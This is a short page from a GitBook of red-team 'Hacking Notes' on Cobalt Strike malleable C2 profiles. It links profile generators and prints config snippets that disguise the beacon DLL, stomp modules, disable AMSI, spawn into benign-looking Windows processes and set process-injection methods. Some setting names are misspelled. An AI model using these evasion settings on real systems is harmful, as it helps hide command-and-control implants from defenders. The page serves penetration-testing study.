Hacking Notes
Ctrlk
  • Ports & Enumeration
  • Antivirus Evasion
  • Port Forwarding
  • Cloud
  • Word List Creation
  • Active Directory
    • Domain Enumeration
    • Domain Trusts
    • Domain Mapping
    • discretionary access control list (DACL)
    • MS SQL
    • gMSA
    • Exchange
    • Group Exploitation
    • Domain Exploitation
    • Kerberos Attacks
    • SCCM
    • NTDS dumping
    • Impacket
    • ADCS exploitation
    • Privilege Escalation
    • LAPS
  • AI Red Teaming
  • Cloud
    • Azure
    • G-Cloud
    • Enumeration
  • Web Application
    • Info
    • Log Poisoning / PHP Wrapping
    • HTTP Request Smuggling
    • Client Side Desync
    • Enumeration
    • Databases
    • SQL Injection
    • WebSocket
    • File Inclusion
    • Brute forcing
    • Cross Site Scripting (XSS)
  • Cracking
  • Wireless
  • DFIR
    • Forensics
    • Memory Analysis
    • ReverseEngineering
    • Mobile
  • Networking
    • Radio
    • Vlans & Wired networking
    • Network Access Control
    • IPV6
    • Wireless
    • Bluetooth
  • Misc
    • Shells
    • Buffer Overflow
    • Powershell
    • Random Bits
    • Phishing
    • Coding
    • Git
  • Command & Control
    • Meterpreter
    • Droppers
    • CobaltStrike
      • teamserver
      • Payload generation
      • Listeners
      • Malleable Profiles
      • Initial Acces / Aggressors
      • Beacon Object Files (BOF)
      • Cheatsheet
    • Lateral Movement
    • Persistence
  • Mobile App Testing
    • IOS
Powered by GitBook
On this page
  1. Command & Control
  2. CobaltStrike

Malleable Profiles

https://github.com/threatexpress/malleable-c2/blob/master/MalleableExplained.md

LogoGitHub - RedSiege/C2concealer: C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.GitHub
LogoGitHub - threatexpress/random_c2_profile: Cobalt Strike random C2 Profile generatorGitHub

Options:

Beacons:

Post-Ex:

Process-Inject:

PreviousListenersNextInitial Acces / Aggressors

Last updated 2 years ago

  • Options:
  • Beacons:
  • Post-Ex:
  • Process-Inject:
#size of the assembly/powershell scripts 
set tasks_max_size "";
stage {
	set compile_time "DATE OF COMPILATION";
	set image_size_x64 "522090";
	set image_size_x86 "522090";
	set clearnup "true";
	set obfucate "true";
	set name "dataparse.dll";
	set module_x86 "wuaueng.dll";
	set module_x64 "mssrch.dll";
	set stomppe "true";
	transform-x86 {
		strrep "ReflectiveLoader" "RunHelloWorld";
		}
	transform-x64 {
		strrep "ReflectiveLoader" "PrintMenu";
		}
}
##         = random numbers
msagent_## = standard communications 
status_##  = staging over SMB
post-ex {
      # control the temporary process we spawn to
      set spawnto_x86 "`%windir%\syswow64\dllhost.exe` -k netsvcs";.
      set spawnto_x64 "%windir%\\sysnative\\mstsc.exe";

      # change the permissions and content of our post-ex DLLs 
      set obfuscate "true";

      # change our post-ex output named pipe names... _
      set pipename "evil_####, stuff\\not_##_ev#l";
      set pipename_stager "update_##";

      # pass key function pointers from Beacon to its child jobs 
      set smartinject "true";

      # disable AMSI in powerpick, execute-assembly, and psinject 
      set amsi_disable "true";
}
process-inject {
    # set how memory is allocated in a remove process:
    set allocator "VirtualAllocEx";
    
    # shape memory characteristics and content:
    set min_alloc "16384";
    set startrwx "true";
    set userwx "false";
    
    transform-x86 {
        prepend "\x90\x90";
    }
    transform-x64 {
        prepend "\x90\x90";
    }
    
    # determine how to execute the injected code
    execute {
        CreateThread "ntdll.dll!RtlUserThreadStart";
        SetThreadContext;
        RtlCreateUserThread;
    }
}